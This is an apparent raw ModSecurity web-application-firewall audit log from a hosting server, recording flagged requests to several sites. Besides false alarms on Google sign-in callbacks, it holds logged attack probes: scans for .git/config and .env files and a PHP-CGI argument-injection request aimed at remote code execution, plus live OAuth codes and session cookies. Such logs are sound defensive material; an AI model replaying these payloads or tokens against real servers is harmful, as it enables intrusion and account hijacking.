found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIBVxukk8cgt8UnU9rDJwAAAEs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350487891202 432940 (- - -) Stopwatch2: 1753350487891202 432940; combined=5307, p1=624, p2=3906, p3=188, p4=55, p5=533, sr=177, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a5cd6232-Z-- --7fb2bc22-A-- [24/Jul/2025:12:50:52.849333 +0300] aIIB_Bukk8cgt8UnU9rHnAAAAEk 212.28.242.188 39708 127.0.0.1 7081 --7fb2bc22-B-- GET /administration/index.php?code=4/0AVMBsJhgnref-b3zBXQVnrArYiSO7XP_Iyp38xa_hkNDHrTHi3BAHJ_PkQIGTND-OngIkQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-fetch-dest: document user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 referer: https://accounts.google.com/ sec-fetch-site: same-origin sec-fetch-mode: navigate accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=0, i accept-encoding: gzip, deflate, br cookie: PHPSESSID=8nobotf1qklp9cks5l4jvv7990 --7fb2bc22-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --7fb2bc22-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIB_Bukk8cgt8UnU9rHnAAAAEk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350652521452 328051 (- - -) Stopwatch2: 1753350652521452 328051; combined=5716, p1=597, p2=4774, p3=127, p4=73, p5=144, sr=161, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7fb2bc22-Z-- --e4eb0a44-A-- [24/Jul/2025:12:50:56.457282 +0300] aIICABukk8cgt8UnU9rHpwAAAEE 212.28.242.188 52574 127.0.0.1 7081 --e4eb0a44-B-- GET /administration/index.php?code=4/0AVMBsJhgnref-b3zBXQVnrArYiSO7XP_Iyp38xa_hkNDHrTHi3BAHJ_PkQIGTND-OngIkQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-fetch-dest: document user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 referer: https://accounts.google.com/ sec-fetch-site: cross-site sec-fetch-mode: navigate accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=0, i accept-encoding: gzip, deflate, br cookie: PHPSESSID=8nobotf1qklp9cks5l4jvv7990 --e4eb0a44-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --e4eb0a44-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIICABukk8cgt8UnU9rHpwAAAEE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350656156664 300809 (- - -) Stopwatch2: 1753350656156664 300809; combined=5672, p1=666, p2=4536, p3=270, p4=68, p5=132, sr=171, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e4eb0a44-Z-- --50c9370c-A-- [24/Jul/2025:12:52:44.472194 +0300] aIICbBukk8cgt8UnU9rKIQAAAE4 212.227.9.59 33352 127.0.0.1 7081 --50c9370c-B-- GET /.git/config HTTP/1.0 Host: snapcart.io X-Real-IP: 212.227.9.59 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* referer: http://snapcart.io/.git/config --50c9370c-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 16 Mar 2025 19:58:17 GMT ETag: "328-6307b17c198d5" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --50c9370c-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "snapcart.io"] [uri "/.git/config"] [unique_id "aIICbBukk8cgt8UnU9rKIQAAAE4"] Stopwatch: 1753350764467469 4808 (- - -) Stopwatch2: 1753350764467469 4808; combined=2430, p1=553, p2=1802, p3=0, p4=0, p5=75, sr=201, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --50c9370c-Z-- --3ec4a412-A-- [24/Jul/2025:12:52:44.545219 +0300] aIICbFooLYw4or2LgWLrIAAAAMM 212.227.9.59 33390 127.0.0.1 7081 --3ec4a412-B-- GET /.git/config HTTP/1.0 Host: snapcart.io X-Real-IP: 212.227.9.59 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* --3ec4a412-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 16 Mar 2025 19:58:17 GMT ETag: "328-6307b17c198d5" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --3ec4a412-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "snapcart.io"] [uri "/.git/config"] [unique_id "aIICbFooLYw4or2LgWLrIAAAAMM"] Stopwatch: 1753350764539206 6094 (- - -) Stopwatch2: 1753350764539206 6094; combined=3121, p1=685, p2=2365, p3=0, p4=0, p5=70, sr=195, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3ec4a412-Z-- --bfa73646-A-- [24/Jul/2025:12:53:33.041175 +0300] aIICnITiRAaWRFFxa-Xr3AAAAMY 93.123.109.64 50210 127.0.0.1 7081 --bfa73646-B-- GET /.git/config HTTP/1.0 Host: erp.jac.group X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; POCO F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --bfa73646-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=335ef9280e6fa98858028eb7c95bef5b; expires=Thu, 24-Jul-2025 10:54:32 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --bfa73646-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/.git/config"] [unique_id "aIICnITiRAaWRFFxa-Xr3AAAAMY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350812934600 106696 (- - -) Stopwatch2: 1753350812934600 106696; combined=112657, p1=9703, p2=2355, p3=0, p4=0, p5=50381, sr=156, sw=1, l=0, gc=50217 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bfa73646-Z-- --71875b59-A-- [24/Jul/2025:12:53:33.895993 +0300] aIICnTzwUUVu1Y0WeVTnIwAAABY 146.190.242.161 50310 127.0.0.1 7081 --71875b59-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: erp.jac.group X-Real-IP: 146.190.242.161 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 164 User-Agent: Go-http-client/1.1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --71875b59-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=3be2c9b5fbe5bcc99b806bad4500fd28; expires=Thu, 24-Jul-2025 10:54:33 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --71875b59-H-- Message: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||erp.jac.group|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions="" \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||erp.jac.group|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\\\\x5cxadd cgi.force_redirect=0 \\\\x5cxadd disable_functions=\\\\x22\\\\x22 \\\\x5cxadd allow_url_include=1 \\\\x5cxadd auto_prepend_file=php://input: \\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions=\\\\x22\\\\x22 \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "erp.jac.group"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aIICnTzwUUVu1Y0WeVTnIwAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350813845209 50876 (- - -) Stopwatch2: 1753350813845209 50876; combined=6054, p1=766, p2=4914, p3=0, p4=0, p5=374, sr=325, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --71875b59-Z-- --fbd07c74-A-- [24/Jul/2025:12:53:39.159174 +0300] aIICozzwUUVu1Y0WeVTnLAAAABM 146.190.242.161 50672 127.0.0.1 7081 --fbd07c74-B-- GET /.env HTTP/1.0 Host: erp.jac.group X-Real-IP: 146.190.242.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --fbd07c74-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=c45bfd5462eeb2b413f9c0072f1f36b9; expires=Thu, 24-Jul-2025 10:54:39 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --fbd07c74-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/.env"] [unique_id "aIICozzwUUVu1Y0WeVTnLAAAABM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350819113643 45620 (- - -) Stopwatch2: 1753350819113643 45620; combined=2982, p1=595, p2=2257, p3=0, p4=0, p5=129, sr=178, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fbd07c74-Z-- --696a5b2d-A-- [24/Jul/2025:12:53:39.645596 +0300] aIICo4TiRAaWRFFxa-XsBAAAANE 146.190.242.161 50702 127.0.0.1 7081 --696a5b2d-B-- GET /.git/config HTTP/1.0 Host: erp.jac.group X-Real-IP: 146.190.242.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --696a5b2d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=55d3731e63a565fa2ff6d9caeea15e47; expires=Thu, 24-Jul-2025 10:54:39 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --696a5b2d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/.git/config"] [unique_id "aIICo4TiRAaWRFFxa-XsBAAAANE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350819598323 47354 (- - -) Stopwatch2: 1753350819598323 47354; combined=3276, p1=710, p2=2444, p3=0, p4=0, p5=122, sr=275, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --696a5b2d-Z-- --407c5f52-A-- [24/Jul/2025:12:54:47.178021 +0300] aIIC54TiRAaWRFFxa-XuRwAAANA 93.123.109.64 60068 127.0.0.1 7081 --407c5f52-B-- GET /.git/config HTTP/1.0 Host: erp.jac.group X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: facebookexternalhit/1.1 Accept-Charset: utf-8 Accept-Encoding: gzip --407c5f52-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=a73a48d97a4a485ef0a8322b39ef18e2; expires=Thu, 24-Jul-2025 10:55:47 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --407c5f52-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/.git/config"] [unique_id "aIIC54TiRAaWRFFxa-XuRwAAANA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350887129491 48612 (- - -) Stopwatch2: 1753350887129491 48612; combined=4948, p1=1391, p2=3450, p3=0, p4=0, p5=106, sr=156, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --407c5f52-Z-- --0f056a00-A-- [24/Jul/2025:12:55:05.151438 +0300] aIIC94TiRAaWRFFxa-XufAAAANI 195.112.198.68 38418 127.0.0.1 7081 --0f056a00-B-- GET /administration/index.php?code=4/0AVMBsJgj7QO63bWhIyBZ1NOJG8YfzJqmjpB3U8g2EDijoMzzkcovpjPPeeS322HzyF-nWA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=cbm1oakl0f868ouoiisu0ahph4 --0f056a00-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --0f056a00-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIC94TiRAaWRFFxa-XufAAAANI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350903009730 2141824 (- - -) Stopwatch2: 1753350903009730 2141824; combined=5924, p1=725, p2=4923, p3=112, p4=64, p5=100, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0f056a00-Z-- --a9f8661f-A-- [24/Jul/2025:12:55:13.943068 +0300] aIIDAYTiRAaWRFFxa-XvKgAAANQ 93.123.109.64 43354 127.0.0.1 7081 --a9f8661f-B-- GET /.git/config HTTP/1.0 Host: erp.jac.group X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --a9f8661f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=bf075f0717d1e70719d010a4bed0ad23; expires=Thu, 24-Jul-2025 10:56:13 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --a9f8661f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/.git/config"] [unique_id "aIIDAYTiRAaWRFFxa-XvKgAAANQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753350913871818 71350 (- - -) Stopwatch2: 1753350913871818 71350; combined=3405, p1=611, p2=2679, p3=0, p4=0, p5=114, sr=160, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a9f8661f-Z-- --e69c312c-A-- [24/Jul/2025:12:57:49.088525 +0300] aIIDnDzwUUVu1Y0WeVTsvgAAAAk 212.28.242.188 53988 127.0.0.1 7081 --e69c312c-B-- GET /administration/index.php?code=4/0AVMBsJh8UO26BsM63Db5ElKV-NeMb62C4gseI9flI5UeJUIuckfGU-obOXekwkSfINla6Q&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=4dp1jn4vujk002pum2otk7klh6 --e69c312c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 